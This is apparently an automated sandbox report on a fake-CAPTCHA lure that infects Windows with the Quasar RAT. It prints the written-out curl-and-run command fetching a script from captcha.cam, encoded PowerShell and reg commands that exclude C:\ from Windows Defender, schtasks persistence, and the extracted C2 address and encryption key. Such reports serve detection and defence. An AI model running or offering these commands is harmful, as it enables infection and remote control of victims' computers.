Analysis
max time kernel: 44s
max time network: 45s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30/12/2024, 03:20
Static task
static1
URLScan task
urlscan1
Malware Config
Extracted
https://captcha.cam/file.b64
Extracted
quasar
1.4.1
28
194.26.192.167:2768
859d5f90-e2d0-4b2d-ba9f-5371df032ec2
encryption_key: BE2B0B270E4DB19CAA5C42E9D2EBF64645A2D055
install_name: RuntimeBroker.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: RuntimeBroker
subdirectory: RuntimeBroker
Signatures
Quasar family

Quasar payload (2 IoCs)
resource: behavioral1/files/0x000a000000023bae-448.dat, yara_rule: family_quasar
resource: behavioral1/memory/3920-456-0x0000000000AB0000-0x0000000000DD4000-memory.dmp, yara_rule: family_quasar

Blocklisted process makes network request (1 IoCs)
flow 92, pid 3184, powershell.exe

pid 3596, powershell.exe
pid 4932, powershell.exe
pid 3352, powershell.exe
pid 1500, powershell.exe

Executes dropped EXE (2 IoCs)
pid 3920, RuntimeBroker.exe
pid 3708, RuntimeBroker.exe

Checks processor information in registry (2 TTPs, 8 IoCs)
Processor information is often read in order to detect sandboxing environments.
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz (firefox.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString (firefox.exe)
Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 (firefox.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature (firefox.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision (firefox.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier (firefox.exe)

Modifies registry class (2 IoCs)
Key created: \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings (firefox.exe)
Key created: \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings (powershell.exe)

Scheduled Task/Job: Scheduled Task (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid 1444, schtasks.exe
pid 4844, schtasks.exe

Suspicious behavior: EnumeratesProcesses (21 IoCs)
pid 3596, powershell.exe
pid 3352, powershell.exe
pid 4932, powershell.exe
pid 920, powershell.exe
pid 1500, powershell.exe
pid 5004, powershell.exe
pid 3184, powershell.exe

Suspicious use of AdjustPrivilegeToken (11 IoCs)
Token: SeDebugPrivilege, pid 764, firefox.exe
Token: SeDebugPrivilege, pid 3596, powershell.exe
Token: SeDebugPrivilege, pid 3352, powershell.exe
Token: SeDebugPrivilege, pid 4932, powershell.exe
Token: SeDebugPrivilege, pid 920, powershell.exe
Token: SeDebugPrivilege, pid 1500, powershell.exe
Token: SeDebugPrivilege, pid 5004, powershell.exe
Token: SeDebugPrivilege, pid 3184, powershell.exe
Token: SeDebugPrivilege, pid 3920, RuntimeBroker.exe
Token: SeDebugPrivilege, pid 3708, RuntimeBroker.exe

Suspicious use of FindShellTrayWindow (21 IoCs)
pid 764, firefox.exe

Suspicious use of SendNotifyMessage (20 IoCs)
pid 764, firefox.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
pid 764, firefox.exe
pid 3708, RuntimeBroker.exe

Suspicious use of WriteProcessMemory (64 IoCs)
PID 3260 wrote to memory of 764: pid 3260, firefox.exe, procid_target 82
PID 764 wrote to memory of 4996: pid 764, firefox.exe, procid_target 83
PID 764 wrote to memory of 1712: pid 764, firefox.exe, procid_target 84

Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes
PID 3260: C:\Program Files\Mozilla Firefox\firefox.exe
  cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://medai.tv"
  - Suspicious use of WriteProcessMemory
  PID 764: C:\Program Files\Mozilla Firefox\firefox.exe
    cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://medai.tv
    - Checks processor information in registry
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID 4996: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2008 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6ce8aba-93c6-4537-85cb-908f87db836d} 764 "\\.\pipe\gecko-crash-server-pipe.764" gpu
    PID 1712: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2316 -parentBuildID 20240401114208 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f7289fc-3140-428d-a6e8-a26042a6cc23} 764 "\\.\pipe\gecko-crash-server-pipe.764" socket
    PID 4312: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3112 -childID 1 -isForBrowser -prefsHandle 3140 -prefMapHandle 2628 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fdf57289-1334-4bba-8b17-12169bfb1fac} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    PID 4036: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3668 -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 2616 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b48e739-1c3b-4774-92fd-542f144bba33} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    PID 4756: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4520 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4508 -prefMapHandle 4512 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {953d5e7e-af0b-4a3e-9540-4936c3682eef} 764 "\\.\pipe\gecko-crash-server-pipe.764" utility
      - Checks processor information in registry
    PID 3244: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5456 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5416 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {77771912-dd94-4862-b468-199954f4ec4a} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    PID 3264: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3088 -childID 4 -isForBrowser -prefsHandle 3156 -prefMapHandle 3172 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de42e1e9-9c6d-4f08-b865-b80cee315325} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    PID 3256: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5464 -childID 5 -isForBrowser -prefsHandle 3048 -prefMapHandle 3184 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4368b503-61a7-476d-b36d-59d1bc781c57} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    PID 1460: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5960 -childID 6 -isForBrowser -prefsHandle 5880 -prefMapHandle 5888 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {cb28e191-7c5e-4eff-b6b2-cf94ffe7d9f9} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
    PID 2112: C:\Program Files\Mozilla Firefox\firefox.exe
      cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 7 -isForBrowser -prefsHandle 5872 -prefMapHandle 6100 -prefsLen 27178 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9cf56ab8-6b9e-4cbf-8022-acd6309dd742} 764 "\\.\pipe\gecko-crash-server-pipe.764" tab
PID 4632: C:\Windows\system32\cmd.exe
  cmdline: "C:\Windows\system32\cmd.exe" /c "curl -k -L -Ss https://captcha.cam/t.cmd -o "C:\Users\Admin\AppData\Local\Temp\1.cmd" && "C:\Users\Admin\AppData\Local\Temp\1.cmd"" # Press OK or ENTER to complete verification. By pressing OK you confirm you are not a robot.
  PID 4932: C:\Windows\system32\curl.exe
    cmdline: curl -k -L -Ss https://captcha.cam/t.cmd -o "C:\Users\Admin\AppData\Local\Temp\1.cmd"
  PID 3596: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell -w h -command ""
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  PID 3352: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmdline: powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\Admin\AppData\Local\Temp\1.cmd"' -ArgumentList 'am_admin'"
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID 5032: C:\Windows\System32\cmd.exe
      cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1.cmd" am_admin
      PID 4932: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -w h -command ""
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      PID 920: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID 1500: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
      PID 5004: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID 4632: C:\Windows\system32\reg.exe
          cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
      PID 3184: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -enc [...]
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID 3920: C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe
          cmdline: "C:\Users\Admin\AppData\Local\Temp\RuntimeBroker.exe"
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID 1444: C:\Windows\system32\schtasks.exe
            cmdline: "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f
            - Scheduled Task/Job: Scheduled Task
          PID 3708: C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe
            cmdline: "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe"
            - Executes dropped EXE
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
            PID 4844: C:\Windows\system32\schtasks.exe
              cmdline: "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker\RuntimeBroker.exe" /rl HIGHEST /f
              - Scheduled Task/Job: Scheduled Task
Network
MITRE ATT&CK Enterprise v15
Downloads